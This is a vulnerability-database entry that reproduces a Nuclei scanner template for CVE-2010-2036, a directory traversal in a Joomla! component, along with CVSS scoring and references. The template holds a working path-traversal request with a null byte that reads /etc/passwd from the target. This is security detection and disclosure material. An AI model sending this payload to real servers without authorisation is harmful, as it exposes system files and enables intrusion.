Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2010-2036
HistoryAug 19, 2021 - 11:58 p.m.

Joomla! Component Percha Fields Attach 1.0 - Directory Traversal

2021-08-1923:58:33
ProjectDiscovery
github.com
2
directory traversal vulnerability
joomla
remote attackers
arbitrary files
unauthorized disclosure

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

AI Score

7.1

Confidence

High

EPSS

0.007

Percentile

80.8%

A directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach) component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a … (dot dot) in the controller parameter to index.php.

id: CVE-2010-2036

info:
  name: Joomla! Component Percha Fields Attach 1.0 - Directory Traversal
  author: daffainfo
  severity: high
  description: A directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach) component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
  impact: |
    An attacker can access sensitive files on the server, potentially leading to unauthorized disclosure of sensitive information.
  remediation: Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/34004
    - https://nvd.nist.gov/vuln/detail/CVE-2010-2036
    - http://packetstormsecurity.org/1005-exploits/joomlaperchafa-lfi.txt
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
    cvss-score: 7.5
    cve-id: CVE-2010-2036
    cwe-id: CWE-22
    epss-score: 0.08973
    epss-percentile: 0.94583
    cpe: cpe:2.3:a:percha:com_perchafieldsattach:1.0:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: percha
    product: com_perchafieldsattach
  tags: cve,cve2010,lfi,joomla,edb,packetstorm,percha

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_perchafieldsattach&controller=../../../../../../../../../../etc/passwd%00"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a004730450221009a3b425ae5ec2bbe01c2787c7d7024e0155bdd84568b28dcfa6e1f464a6bbd9902207b990f2ce66a6360bdb52a7cb037367687c2db90c33ab76fcd01adcbc246470a:922c64590222798bb761d5b6d8e72950

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

AI Score

7.1

Confidence

High

EPSS

0.007

Percentile

80.8%

Related for NUCLEI:CVE-2010-2036